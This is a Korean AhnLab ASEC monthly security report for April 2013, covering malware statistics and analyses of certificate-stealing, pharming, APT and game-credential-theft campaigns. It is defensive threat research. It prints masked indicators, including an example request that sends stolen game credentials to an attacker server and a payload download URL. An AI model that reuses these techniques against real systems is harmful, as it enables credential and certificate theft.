ASEC REPORT VOL.40 2013.05 안랩월간보안보고서 2013 년 4 월보안동향
CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. 2013 년 4 월보안동향 악성코드동향 01. 악성코드통계 03-4월악성코드, 전월대비 217만여건감소 - 악성코드대표진단명감염보고최다 20-4월최다신종악성코드온라인게임핵 - 4월악성코드유형트로이목마가최다 - 악성코드유형별감염보고전월비교 - 신종악성코드유형별분포 02. 악성코드이슈 07 - 공인인증서탈취악성코드기승, 주의 - 한글문서취약점을이용한 APT 공격 - 원본파일의정체를숨긴그림파일주의 - 악성코드경유지로이용된 Sourceforge.net - 보스턴마라톤테러동영상메일로위장한악성코드 - hosts.ics를이용한파밍사이트접속유도 - 북핵관련문서파일로위장한악성코드 - PUP 이용한온라인게임핵유포 백신위장한 PUP 설치까지 - 인기게임에숨어든 좀비 PC 만드는악성코드 - 구인정보메일에숨어유포된악성코드 - 세계적인물류업체 DHL로위장한스팸메일 - HSBC 은행위장스팸메일 - 출장보고서문서파일로위장한악성코드 - 메일에첨부된악성 HWP 보안동향 01. 보안통계 24-4월마이크로소프트보안업데이트현황 02. 보안이슈 25 - Internet Explorer 제로데이취약점 (CVE-2013-1347) - 사용자 PC를제어하는악성원격관리프로그램주의웹보안동향 01. 웹보안통계 27 - 웹사이트악성코드동향 - 월별악성코드배포 URL 차단건수 - 월별악성코드유형 - 월별악성코드가발견된도메인 - 월별악성코드가발견된 URL - 악성코드유형별배포수 - 악성코드배포순위 02. 웹보안이슈 30 - 언론사사이트를통한악성코드유포 - 취업포털사이트를통한악성코드유포 03. 모바일악성코드이슈 22 - 스마트폰사용자의공인인증서를탈취하는악성앱발견
3 01 악성코드동향 악성코드통계 4월악성코드, 전월대비 217만여건감소 15,000,000 ASEC이집계한바에따르면, 2013 년 4월에감염이보고된악성코드는 550만 8895건인것으로나타났다. 이는전월 768만 5579건에비 10,000,000 5,000,000 6,708,830 30.1% +976,749 7,685,579 14.6% -2,176,684 5,508,895 28.3% 해 217만 6684건이감소한수치다 ([ 그림 1-1]). 이중에서가장많이보고된악성코드는 Win-Trojan/ Onlinegamehack140.Gen이었으며, ASD.PREVENTION과 Textimage/ Autorun가다음으로많았다. 또한총 7건의악성코드가최다 20건목록에새로이름을올렸다 ([ 표 1-1]). 0 02 03 04 그림 1-1 월별악성코드감염보고건수변화추이 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack140.Gen 238,345 13.1 % 2 ASD.PREVENTION 200,144 11.0 % 3 2 Textimage/Autorun 175,631 9.7 % 4 Trojan/Win32.urelas 140,562 7.7 % 5 1 Trojan/Win32.onlinegamehack 109,826 6.0 % 6 6 Malware/Win32.generic 101,956 5.6 % 7 4 Adware/Win32.winagir 85,380 4.7 % 8 1 Trojan/Win32.adh 77,202 4.2 % 9 1 Trojan/Win32.Gen 71,338 3.9 % 10 1 Malware/Win32.suspicious 71,104 3.9 % 11 NEW Win-Trojan/Wgames.Gen 69,839 3.8 % 12 2 RIPPER 65,335 3.6 % 13 NEW Win-Trojan/Asd.variant 61,490 3.4 % 14 6 Trojan/Win32.scar 59,941 3.3 % 15 NEW Win-Trojan/Onlinegamehack.204632 59,504 3.3 % 16 NEW Als/Bursted 56,777 3.2 % 17 NEW Win-Trojan/Avkiller4.Gen 53,479 2.9 % 18 5 Trojan/Win32.agent 43,353 2.4 % 19 NEW Win32/Autorun.worm.307200.F 43,212 2.4 % 20 NEW Win32/Virut.f 32,568 1.9 % TOTAL 1,816,986 100.0 % 표 1-1 2013년 4월악성코드최다 20건 ( 감염보고, 악성코드명기준 )
4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20건을추린것이다. 이중 Trojan/Win32가총 77만 5707건으로가장빈번히보고된것으로조사됐으며 Win-Trojan/Onlinegamehack 이 45만 4205건, Win-Trojan/Agent 가 32만 6467건으로그뒤를이었다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32 775,707 22.0 % 2 Win-Trojan/Onlinegamehack 454,205 12.9 % 3 Win-Trojan/Agent 326,467 9.3 % 4 1 Win-Trojan/Onlinegamehack140 238,345 6.8 % 5 1 Adware/Win32 206,034 5.8 % 6 ASD 200,144 5.7 % 7 Malware/Win32 183,431 5.2 % 8 2 Textimage/Autorun 175,657 5.0% 9 1 Win-Trojan/Downloader 175,399 5.0 % 10 6 Win32/Conficker 91,017 2.6 % 11 3 Win32/Virut 83,909 2.4 % 12 7 Win32/Autorun.worm 78,999 2.2 % 13 NEW Backdoor/Win32 72,626 2.1 % 14 NEW Win-Trojan/Wgames 69,839 2.0 % 15 3 Win-Trojan/Avkiller 69,304 2.0 % 16 4 Win32/Kido 68,128 1.9 % 17 NEW RIPPER 65,335 1.9 % 18 9 Win-Adware/Korad 64,421 1.8 % 19 4 Downloader/Win32 64,121 1.8 % 20 NEW Win-Trojan/Asd 61,490 1.6 % TOTAL 3,524,578 100.0 % 표 1-2 악성코드대표진단명최다 20건 4월최다신종악성코드온라인게임핵 [ 표 1-3] 은 4월에신규로접수된악성코드중감염보고가가장많았던 20건을꼽은것이다. 4월의신종악성코드는온라인게임핵 (Win- Trojan/Onlinegamehack.204632) 이 5만 9504건으로전체의 18.1% 를차지했다. 애드웨어 (Win-Adware/ Shortcut.973712) 는 2만 6568건이보고돼 8.1% 의비율을보였다. 순위 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack.204632 59,504 18.1 % 2 Win-Adware/Shortcut.973712 26,568 8.1 % 3 Win-Trojan/Onlinegamehack.205288 26,549 8.1 % 4 Win-Trojan/Downloader.301568.E 25,052 7.6 % 5 Win-Trojan/Systemhijack.120307 18,882 5.7 % 6 Win-Spyware/Pbot.8069377 17,911 5.4 % 7 Win-Trojan/Agent.28871 16,897 5.1 % 8 Win-Trojan/Avkiller.43904 15,440 4.7 % 9 Win-Trojan/Onlinegamehack.271872.AE 14,900 4.5 % 10 Win-Trojan/Onlinegamehack.339968.O 13,345 4.1 % 11 Win-Trojan/Onlinegamehack.344064.G 12,997 4.0 % 12 Win-Trojan/Egapel.29318 12,420 3.8 % 13 Win-Trojan/Agent.44544.WB 11,886 3.6 % 14 Win-Adware/NATService.1369736 9,426 2.9 % 15 Win-Trojan/Onlinegamehack.270336.AF 8,566 2.6 % 16 Win-Trojan/Onlinegamehack.244224 8,348 2.5 % 17 Win-Trojan/Onlinegamehack.344064.H 8,084 2.5 % 18 Win-Trojan/Killav.83897600 8,054 2.4 % 19 Win-Trojan/Onlinegamehack.261120.D 7,629 2.3 % 20 Win-Adware/KorAd.153608 6,482 2.0 % TOTAL 328,940 100.0 % 표 1-3 4월신종악성코드최다 20건
5 4월악성코드유형트로이목마가최다 [ 그림 1-2] 는 2013년 4월 1개월간안랩고객으로부터감염이보고된악성코드의유형별비율을집계한결과다. 트로이목마 (Trojan) 가 57.2% 로가장높은비율을나타냈고애드웨어 (Adware) 와웜 (Worm) 이각각 6.5% 의비율을차지했다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 트로이목마, 애드웨어, 웜, 바이러스, 다운로드, 스파이웨어등은전월에비해증가세를보였으며, 스크립트, 드롭퍼는감소했다. 그림 1-3 2013 년 3 월 vs. 2013 년 4 월악성코드유형별비율
6 신종악성코드유형별분포 4월의신종악성코드를유형별로살펴보면트로이목마가 80% 로가장많았고, 애드웨어가 13%, 스파이웨어가 4% 로각각집계됐다. 그림 1-4 신종악성코드유형별분포
7 02 악성코드동향 악성코드이슈 공인인증서탈취악성코드기승, 주의공인인증서를탈취하는악성코드가또다시발견돼사용자의주의가요구된다. 이악성코드는취약점을이용해드라이브바이다운로드방식으로악성코드를유포한뒤, 감염된시스템에서공인인증서를수집해 FTP를통해전송한다. 악성코드제작자가악성코드유포를위해마련한사이트에접속하면 [ 그림 1-5] 와같은악성스크립트가동작하게된다. 사용하는브라우저의종류와 Java( 자바 ) 사용여부를체크한뒤, 악성스크립트가동작한다. [ 그림 1-7] 과같이공인인증서탈취를위해제작된 전자서명작성 창은실제금융기관에서사용하는것과매우유사하게만들어져일반인이쉽게눈치채기어렵다. 하지만자세히살펴보면미묘한차이점이있다. 패스워드를탈취하기위한공인인증서창은입력을받는부분이하나더존재하고, 커서 (Cursor) 두개가동시에깜빡이는것을확인할수있다. 그림 1-7 정상공인인증서 ( 왼쪽 ), 비정상공인인증서 ( 오른쪽 ) 그림 1-5 악성스크립트코드 탈취된공인인증서패스워드는시스템에서수집한맥주소와함께미국로스앤젤레스 (LA) 부근에위치한원격시스템으로전송된다. 악성코드에감염되면공인인증서창의클래스명인 QWidget 을감시한다. 만약공인인증서가실행이되면 GetWindowTextW 를이용해서입력된공인인증서패스워드의탈취를시도한다. 그림 1-8 맥주소탈취하는코드 그림 1-9 원격시스템으로공인인증서패스워드를전송하는코드 해당악성코드는감염된시스템에서공인인증서가있는지검색을하기도한다. 그림 1-6 공인인증서탈취코드 그림 1-10 공인인증서구성파일
8 [ 그림 1-14] 의 HWP 파일의문서정보를살펴보면작성자이름은 baidu1 으로중국포털사이트의이름이었다. 문서내용은 4월 11 일에최종수정된것으로보아 APT 공격을위해최근제작된것으로추정된다. 그림 1-11 공인인증서를검색하는코드 검색된공인인증서가있으면 FTP를통해원격시스템으로전송하고감염자의맥주소로서버에폴더를생성한다. [ 그림 1-12] 는실제해당 FTP 서버로접속해지금까지수집된공인인증서리스트다. 그림 1-14 HWP 문서정보 분석당시취약점이있는한글문서는보안패치가되지않은 2007버전에서실행할경우취약점이동작하는것으로확인됐다. 그림 1-12 공인인증서를수집하는원격시스템 그림 1-15 파일구성도 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Dloader (2013.04.01.00) 한글문서취약점을이용한 APT 공격최근국내에서특정기관을타깃으로한수상한한글문서가이메일로첨부돼유포되고있다는보고가접수됐다. 특정기관을타깃으로정보유출을시도하는전형적인지능형지속보안위협 (APT, Advanced Persistent Threat) 공격이었다. 이메일로유포된취약점이있는한글문서는 한국의대응전략.hwp 파일로, 외교안보연구원이 2012년 국제정세전망 에서밝힌북한의핵개발실험에대한전망과 6 자회담재개가능성및회담의효용성등에관한내용이담겨있다. 생성된파일을확인해보면 [ 그림 1-15] 와같이취약점에의해생성된 SVCH0ST.exe 파일이 ppst.temp, hwp.exe, 한국의대응전략.hwp 파일을생성하고 hwp.exe 파일이 mscmos.sys, linkinfo.dll, KB3088750. exe 파일을생성하는것을볼수있다. ppst.temp 파일은 SVCH0ST.exe 파일과동일하고, KB3088750.exe 파일은 hwp.exe 파일과동일하다. SVCH0ST.exe 파일에의해생성된한국의대응전략.hwp 파일은위 [ 그림 1-13] 과같은정상한글파일이다. mscmos.sys 파일은인코딩된것으로보이는데이터파일로추정되며, linkinfo.dll 파일은정상윈도우파일로가장한것으로보인다. 정상 linkinfo.dll 파일은윈도우시스템폴더 (%Systemroot%\system32) 에위치하는반면, hwp.exe 파일에생성된 linkinfo.dll 파일은윈도우폴더 (%Systemroot%) 에생성된다. 이는시스템시작시자동실행을위해레지스트리에등록하지않고도윈도우셸 (Shell) 이로딩되면서자동으로실행되도록하기위한것으로보인다. 그림 1-16 linkinfo.dll 파일비교 ( 왼쪽 : 정상, 오른쪽 : 악성 ) 그림 1-13 HWP 문서내용 [ 그림 1-16] 에서보이는것처럼정상 linkinfo.dll 파일과다르게악
9 성 linkinfo.dll 파일은원본파일이름이다르다. linkinfo.dll 파일은 explorer.exe 프로세스에인젝션돼실행되면서아래와같은 C&C 서버에주기적으로접속을시도한다. C&C 서버 : 59.1**.2**.4*: 88 V3 제품에서는아래와같이진단이가능하다. 본파일은진단하지않고있었다. 최근국내에서유포된게임핵변형중에도이와비슷한형태로실행파일이아닌것처럼위장한형태가발견됐다. 이악성코드는 [ 그림 1-18] 에서보는것과같이실행파일상단에그림파일인것처럼 JPG 파일헤더를추가함으로써보안제품에서탐지하지못하도록위장하고있다. <V3 제품군의진단명 > HWP/Agent (2013.04.13.00) Win-Trojan/Agent.145920.CA (2013.04.14.00) Win-Trojan/Agent.128512.FB (2013.04.14.00) Win-Trojan/Agent.61480960 (2013.04.14.00) 원본파일의정체를숨긴그림파일주의악성코드제작자는악성코드가보안제품에탐지되거나 PC 사용자에게발견되는것을우회하기위해다양한시도를하고있다. 실행압축프로그램을이용해원본파일의정보를쉽게알수없도록하거나, 파일의확장자를 jpg와같은다른포맷의파일형식으로변경해실행파일이아닌것처럼위장하는것이대표적이다. 최근에는다른형태의파일내부에악성코드파일을저장해놓는등의방식으로보안관리자와보안장비를회피하려는시도도계속되고있다. [ 그림 1-17] 은최근해외에서보고된트위터를이용한타깃공격에사용된악성코드다. 그림 1-18 jpg 헤더가추가된악성파일실제악성파일의헤더가시작되는앞단의데이터를제거하면악성코드가동작하는데이악성코드는최근유행하는온라인게임의변종으로아래와같이다양한루트킷을설치하고윈도우실행파일을악성으로변조하며사용자계정정보를탈취한다. - C:\WINDOWS\SYSTEM32\drivers\xpV3001.sys - C:\WINDOWS\SYSTEM32\drivers\420a0a1f.sys - C:\WINDOWS\SYSTEM32\ws2help.dll 대부분의악성코드유포지는정상적인서비스를제공하는서버를해킹해서악의적인용도로사용하는경우가많기때문에잔존주기가길지않다. 하지만이번사례와같이데이터가변경된경우에는서버를관리하는관리자의입장에서도그림파일로오해해악성으로인지하지못할가능성이있어상대적으로오랜시간동안악성코드를유포할수있었다. 앞서소개한타깃공격에이용된관련악성코드의경우지난 2월경발견돼대부분의백신제품에서진단을하고있지만현재까지도웹사이트에서 swf 파일로위장한악성코드를유포하고있다. 그림 1-17 swf파일에저장된악성파일플래시파일로제작됐지만보안취약점이있는 PC의사용자가트위터에등록된 URL을클릭하면 CVE-2013-0634 취약점을이용한공격을수행해 swf 파일내부의악성코드를실행, 시스템을감염시킨다. swf 파일에는 32비트와 64비트 OS용으로제작된두개의악성코드가저장돼있는데흥미로운것은두파일모두파일헤더에불필요한문자를추가해실행파일이아닌것처럼위장해탐지를회피하려는제작자의치밀함을엿볼수있다는점이다. 변조된헤더를조작해정상실행파일로변경한악성코드를바이러스토탈 (Virustotal) 사이트에서검사해본결과, 절반이상의제품들이악성으로진단했으나변조된원 이러한상황은온라인게임핵의경우에도크게다르지않다. 일반적인실행파일의형태로유포되는악성코드가국내사이트에서유포되는경우, 대부분 1 2일안에제거되거나실행파일이제작자에의해지속적으로변경되는경우가대부분이지만위장된형태의악성코드는상대적으로오랜기간동안유지되고있다. 공격자의입장에서공격을유발하는파일을공격대상시스템에안전하게저장하고지속적으로유포할수있는가능성을높이는것은매우고무적인일이다. 악성코드로변환할수있는원본이탐지되지않고오래남아있으면실제로실행되는악성파일이탐지되더라도부팅등과같은특별한이벤트가발생할때지속적으로원본파일을활용해감염시킬수도있고, 사용자가위장된파일안에숨어있는원본파
10 일의존재를확인하는것도상대적으로어려워해커가오랜기간동안시스템을장악할수있기때문이다. 이와같이다른형태의파일로위장한악성코드는백신제품이나네트워크보안제품들이악성으로인지하지못하는경우가많아해킹된서버나공격을시도하는대상시스템에안전하게저장돼오랜기간동안사용되며이로인해지속적인피해를유발할가능성이높으므로주의가필요하다. notice.html이실행됨으로써생성된실행파일의내부코드를살펴보면 [ 그림 1-21] 과같이암호화된것으로추정되는문자열들이존재하며, 해당코드들은복호화루틴을거쳐서복호화된다. 해당악성코드는 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > SWF/Cve-2013-0634 (2013.02.13.00) Win-Trojan/Boda.246272 (2013.02.13.01) Trojan/OnlineGamehack (2013.04.11.05) Win-Trojan/Agent.184320.TV (2013.04.09.00) 악성코드경유지로이용된 Sourceforge.net www.sourceforge.net은사용자가작성한프로그램의소스코드를저장하고다른사람들과공유가쉽도록웹기반의저장공간을제공하는사이트다. 그림 1-21 복호화루틴ㆍ암호화된문자열 -> 복호화된문자열 "073110116101114110101116082101097100070105108101" -> InternetReadFile() "104116116112115058047047115111117114099101102111114103101046110 101116047117115101114115047110101119045119111114108100" -> https:// sourceforge.net/users/******world ㆍ참고사이트 : http://en.wikipedia.org/wiki/sourceforge 그러나간혹악의적인사용자가 www.sourceforge.net에계정을생성한후소스코드가아닌악성코드를업로드해유포하거나악성코드경유지로사용하는경우가종종발생하고있다. 이번에발견한사례는국내게임과관련해언론사사이트를경유해유포된악성코드를조사하는과정에서 sourceforge.net에등록된특정계정이악성코드경유지로사용됐음을확인한것이다. 해당악성코드는해킹된게임관련언론사사이트에접속한 PC에 notice.html을다운로드하도록돼있다. 사용자의 PC에자바취약점 (CVE-2013-0422) 이존재하면 notice.html이동작해내부에포함된실행파일을로컬 PC에생성한다. 그림 1-22 https://sourceforge.net/users/******world https://sourceforge.net/users/******world에접속해보면위 [ 그림 1-22] 처럼계정만생성된상태였다. 악성코드를좀더분석해보면 https://sourceforge.net/users/******world의웹페이지내용을다운로드후 [ 그림 1-23] 처럼메모리에저장한다. 그림 1-23 메모리에저장된웹페이지 그림 1-19 notice.html 다운로드위 [ 그림 1-19] 에서보는코드에의해서로컬 PC에다운로드된 notice.html은취약점을가진 applet.jar(cve-2013-0422) 와 HEX 데이터로구성된실행파일을실행하도록돼있다. 그림 1-20 notice.html에포함된실행파일 악성코드는메모리에저장된웹페이지에서 <title>sourceforge.net: rrryvkmdghpndxyxjhxsybda - User Profile</title> 을추출해복호화한다. 붉은색으로표시된부분을복호화해보면 www.*******sic.com/ x.gif임을확인할수있다. 지금까지내용을정리해보면 notice.html에의해생성된악성코드가실행된뒤접속한 [ 그림 1-22] 의사이트는추가로악성코드를다운로드하기위한주소를 <title> 태그에암호화시켜놨고그암호화된 URL부분을추출및복호화한뒤추가로악성코드 (x.gif) 를다운로드한다. 다운로드된 x.gif 역시암호화돼있으나복호화해보면 [ 그림 1-24] 처
11 럼실행가능한파일임을알수있다. 그림 1-24 복호화된 x.gif 복호화된 x.gif는정상시스템파일을교체하는기능과특정온라인게임사용자의계정정보를탈취할목적을가지고있다. 아래예시는감염된 PC에서특정온라인게임사이트에로그인했을때악의적인사이트로탈취한계정정보를전송하는예다. http://204.***.159.***/xxoo/nm/post.asp?bm12=201341822558&bm1=n AIMA&bm2=NAIMA&bm3=test11111111&bm4=test22222222&bm9=&bm 6=&bm10=&bm11=0&bm5=&bm7=&px1=&px2=" V3 제품에서는아래와같이진단이가능하다. 그림 1-26 악성코드유포페이지해당웹페이지에는일정시간이지나면특정파일 (boston. avi.exe) 을다운로드하도록 meta 태그가삽입돼있으며, 자바취약점을이용해악성코드가유포되도록 iframe도삽입돼있다. <V3 제품군의진단명 > Win-Trojan/Onlinegamehack.54784.BD (2013.04.21.00) Win-Trojan/Onlinegamehack.194048 (2013.04.21.00) Win-Trojan/Onlinegamehack.84007559 (2013.04.21.00) 보스턴마라톤테러동영상메일로위장한악성코드 최근미국보스턴 (Boston) 마라톤대회에서발생한테러관련스팸메일을이용해악성코드가유포돼사용자들의주의가요구된다. 이번에발견된스팸메일은 Aftermath to explosion at Boston Marathon 이란제목으로발송됐으며, 본문에는 [ 그림 1-25] 와같은링크가첨부돼있었다. 그림 1-27 웹페이지에삽입된 iframe 사용자가악성코드 (temp16.exe) 에감염되면, [ 그림 1-28] 과같이스팸메일이무작위로발송된다. 그림 1-25 보스턴마라톤테러관련스팸메일 그림 1-28 temp16.exe 악성코드 사용자가메일에첨부된링크를클릭하면보스턴마라톤테러동영상을보여주는웹페이지로연결된다. 이와유사한형태의악성 URL이다수발견되고있으므로, 발신인이명확하지않거나의심스러운링크가포함된메일을확인할때에는각별한주의가필요하다.
12 하지만최근파밍사이트로접속을시도하는피해시스템들을확인한결과, DNS IP의변경이나 hosts 파일의변조가일어나지않은상태에서도공격자가만들어놓은가짜사이트로접속을시도하는사례가확인됐다. 우리가원하는웹사이트를찾아갈때, 사용자는웹브라우저에해당웹사이트의 URL정보를입력하는데웹브라우저가이 URL 정보를확인하고해당웹사이트를직접찾아가는것이아니라 DNS를통해해당웹서버의 IP를확인해서연결해주는것이다. 웹사이트를찾아갈때, 참조하는정보와우선순위를살펴보면아래와같다. 그림 1-29 악성 URL 정보 V3 제품에서는아래와같이진단이가능하다. 1 로컬시스템의 DNS Cache 정보 2 hosts.ics 3 hosts 4 DNS <V3 제품군의진단명 > Trojan/Win32.Foreign (2013.04.19.00) Trojan/Win32.Agent (2013.04.19.00) Backdoor/Win32.Simda (2013.04.24.05) hosts.ics를이용한파밍사이트접속유도인터넷사용이일반화되면서인터넷뱅킹을통해은행을직접가지않아도책상앞에서손쉽게온라인송금을하거나, 온라인쇼핑몰을통해손쉽게물건을구매할수있는편리한세상이됐다. 그러나이러한기술발전의이면에는조그만부주의가큰손실을가져오기도한다. 최근올바른홈페이지주소를입력해도가짜홈페이지로유도돼개인의금융거래정보를탈취하는파밍사고가지속적으로발생하고있다. 이에파밍기법에대해알아보고, 예방법을공유하고자한다. 일반적으로악성코드제작자들은사용자들의금융정보를가로채기위해사용자의 hosts 파일을변경하거나, 공격자가만들어놓은서버 IP 를사용자 DNS 서버 IP로변경해정상적인금융권사이트에접속해도공격자가만들어놓은가짜사이트에접속되도록만든다. 그러나이같은방법은이미일반화된공격방법이어서, 대부분의보안프로그램들은사용자시스템의 hosts파일을모니터링해변경사실을사용자에게알리거나변경자체를방어하기도한다. 여기서 hosts.ics 파일은일반적으로사용하지않는인터넷연결공유 (ICS: Internet Connection Sharing) 시특정클라이언트의 IP를강제로지정하는기능을하는파일이다. 위순서와같이 hosts.ics 파일이존재하지않을경우, hosts 파일을참조하게되지만, 악성코드제작자입장에서는각종보안프로그램들이주시하고있는 hosts 파일을굳이변경하지않더라도우선순위가높은 hosts.ics 파일을변경, 생성하면원하는파밍사이트로의유도가얼마든지가능하다는것이확인됐다. 최초유포지는지속적으로변경되고있지만, 수집되는악성파일들을분석한결과변조된업데이트파일들이아래경로의악성코드를다운로드하여동작한다는사실을확인했다. http://www.*zs**.**m/e2.exe 위악성파일이다운로드되면 C:\Windows\Tasks 폴더에 conime. exe 파일을생성하게되고, 이악성코드가서비스에자신을등록한뒤외부서버로부터파밍에이용될사이트정보를지속적으로참조한다. 그림 1-30 파밍사이트화면 그림 1-31 지속적으로갱신되는파밍사이트
13 을입력할경우, 입력값을검증해정해진형식과일치하지않으면 [ 그림 1-36] 과같이에러메시지가뜬다. 이러한사실로보아최근발견되는대부분의피싱및파밍사이트들은입력되는값들을무조건수집하는게아니라, 필터링을통해의미있는데이터들을수집한다는것을알수있다. 그림 1-32 악성코드주요기능 이과정에서해당악성코드는아래경로에 hosts.ics 파일을생성하고, 지속적으로모니터링하며파밍사이트를갱신한다. 그림 1-36 입력되는값이형식과맞지않을때의에러화면 그림 1-33 파밍사이트유도를위한 hosts.ics 생성 hosts.ics 파일의우선순위로인해악성코드에감염되면사용자들은정상적인금융권사이트의주소를입력해도 [ 그림 1-34] 와같은악성코드제작자가만들어놓은파밍사이트로접속을하게된다. 파밍사이트에서는어떤메뉴를선택해도 전자금융사기예방시스템 신청을위한개인정보입력화면으로이동한다. 최근확인된온라인게임핵이나파밍관련악성코드들은대부분 PUP( 불필요프로그램 ) 의업데이트파일변조를통해유포되는것으로확인됐다. 이에사용자들이웹사이트방문시설치되는액티브 X(ActiveX) 와파일공유 (P2P) 프로그램의설치시더욱세심한주의를기울여야한다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > BinImage/Ghost (2013.04.16.00) Trojan/Win32.Qhost (2013.04.16.00) 북핵관련문서파일로위장한악성코드 그림 1-34 개인정보입력을유도하는파밍사이트 최근북한과의군사적긴장관계를악용하는악성코드가발견됐다. 발견당시남북한은개성공단폐쇄및북한의미사일발사위협등으로군사적긴장감이상당히높았다. 이런분위기탓에해당파일을실행해악성코드에감염되는사용자가많을것으로보이므로사용자의각별한주의가요구된다. 그림 1-35 개인정보입력을유도하는파밍사이트 개인정보입력란에 [ 그림 1-35] 와같이정확하지않은값 ( 쓰레기값 ) 그림 1-37 MS 워드파일로위장한악성코드
14 이번에발견된악성코드는위와같이 차북핵한국대응조치결과가나왓어요.exe 라는파일명을사용하고있다. MS워드문서파일형식의아이콘을그대로사용하고있지만, 실제파일형식은 exe 실행파일이다. 접속을시도하는 IP 주소가이전에 출장보고서문서파일로위장악성코드 편에서다뤘던 IP 주소와동일한것으로보아동일조직에서제작한악성코드로추측된다. 해당 IP 주소에해당하는서버는중국에위치하고있다. 악성코드는 RAR 실행압축파일로제작돼있으며, 해당파일을실행하면 12.hwp 한글문서파일과다수의 PE 파일을생성하는데그목록은다음과같다. < 악성코드실행시생성되는 PE파일목록 > - C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gm.exe - C:\WINDOWS\system32\SVKP.sys - C:\Documents and Settings\All Users\SysEV\rc.hlp - C:\Documents and Settings\All Users\SysEV\rc.exe - C:\Documents and Settings\All Users\SysEV\rcdll.dll 해당악성코드를실행하면생성되는 12.hwp 파일은자동으로한글프로그램을통해열리기때문에사용자는정상파일이실행된것으로생각하기쉽다. 그러나이것은사용자의눈을속이기위한동작으로, 백그라운드에서는악성코드의감염이진행되고있다. 그림 1-41 네트워크연결정보 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Dropper/Win32.Agent (2013.04.19.03) BinImage/Plugx (2013.03.05.00) Win-Trojan/Inject.4096.N (2012.06.26.04) 그림 1-38 12.hwp 문서가자동으로열린화면 이후악성코드는생성된 SVKP.sys 파일을 SVKP라는서비스명으로등록하고주기적으로동작한다. 조류독감안내문을위장한악성코드발견중국에서발생한신종조류독감 (H7N9) 이확산돼사회적으로이슈가되고있는최근 조류독감안내문 을위장한악성코드가발견돼사용자들의각별한주의가요구된다. 이번에발견된악성코드 ( 조류독감안내문.exe) 는이메일의첨부파일로유포되었을것으로추정되며, 정상적인 MS워드문서로위장하고있다. 그림 1-39 SVKP 라는이름으로서비스에등록된 SVKP.sys 파일 등록된악성서비스는 [ 그림 1-40] 과같이특정 IP로의연결을시도하지만, 현재는해당서버가동작하지않아이후과정을확인할수는없었다. 그림 1-42 조류독감안내문을위장한악성파일 해당파일을실행할경우사용자가악성코드에감염된것을인지할수없도록정상 ( 조류독감안내문.docx) 워드문서가실행된다. 그림 1-40 특정 IP 주소로접속을시도하는서비스프로세스
15 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Agent.714825 (2013.04.15.02) Win-Trojan/Agent.602668 (2013.04.15.02) PUP 이용한온라인게임핵유포 백신위장한 PUP 설치까지 그림 1-43 조류독감안내문.exe 실행화면 최근온라인게임핵으로인한많은피해사례들이보고되고있는가운데, 지난달말에는무료화면복사프로그램인 안카메라 업데이트파일을통해온라인게임핵이유포되기도했다. 최근접수된악성코드감염형태를살펴볼때다수의시스템에 PUP 프로그램이설치돼있었다는점에서 PUP프로그램을통해온라인게임핵이유포되는것이아닌가하는의구심이제기됐다. 악성코드는다음과같은파일을생성하며, Temp 폴더에생성된 vm1ectmp.exe 파일은해당악성코드의복사본이다. 이번에소개하는이슈는실제온라인게임핵이 PUP 프로그램을통해유포되고있다는사실을확인해준사례로, 온라인게임핵의유포방식이나날이다양화해지고있음을방증한다. 그림 1-44 생성파일정보 또한 NEWCLIENT13.EXE 파일을통해 ODBC 폴더에 AppMgmt.dll 파일을생성한다. 많은사람들이무료프로그램이나특정툴을다운로드할때, 제작사의홈페이지를이용하는게아니라일반게시판이나블로그를통해서다운로드한다. 특히최근확인된악성코드유포블로그에서는개인에게무료로제공하는 V3 Lite의설치파일 (v3litesg_setup.exe) 로위장하는사례가발견돼사용자들의주의가요구된다. 해당블로그에서는 V3 Lite 설치와동시에다수의 PUP 프로그램을설치했으며, 이중특정 PUP 프로그램이온라인게임핵을다운로드해설치하는방식을사용했다. 그림 1-45 AppMgmt.dll 파일 - 유포블로그 : hxxp://blog.d***.net/je**o*n9**98/*8 AppMgmt.dll 파일은윈도우서비스 (Application Management) 에등록돼동작하도록구성되어있다. 그림 1-46 서비스등록정보 해당악성코드는시스템정보등을탈취하는데이용될것으로추정되며특정서버 (59.X.X.203) 로접근을시도하나분석시점에는연결되지않았다. 그림 1-47 네트워크연결정보 그림 1-48 악성파일유포블로그에게시된 V3 Lite 로위장한허위파일
16 V3 설치파일로위장한해당설치파일을다운로드한후해당파일의속성을살펴보면안랩홈페이지 (http://www.ahnlab.com) 에서배포하는 V3 Lite의설치버전과다름을알수있다. 그림 1-52 PUP 프로그램과함께설치되는온라인게임핵 그림 1-49 V3 Lite 설치파일비교 ( 왼쪽 : 악성 / 오른쪽 : 정상 ) 블로그에서해당파일을다운로드받아설치를진행하면 [ 그림 1-50] 과다수의제휴프로그램들의설치에대해사용자동의를받는다. 동의를하지않을경우설치가진행되지않아, 사용자의설치를강요한다. 그림 1-53 감염시스템의 MAC, OS, 백신프로그램체크 그림 1-50 PUP 설치를위한사용자동의사용자가이용약관에동의하고설치를진행할경우 V3 Lite 프로그램이정상적으로설치되긴하지만, V3 Lite 설치와동시에바탕화면에여러 P2P 사이트와쇼핑몰사이트의바로가기아이콘이생성되고허위백신프로그램이설치된다. 설치파일실행시다수의 PUP 프로그램이설치되는데, 바탕화면에 P2P 사이트나온라인쇼핑몰바로가기아이콘들이생성되고, 수시로광고웹페이지가열리며, 아래와같이존재하지않는위협요소를띄워서사용자의공포심을유발, 결제를유도하는허위백신프로그램도함께설치된다. 해당온라인게임핵은설치되는과정에서 [ 그림 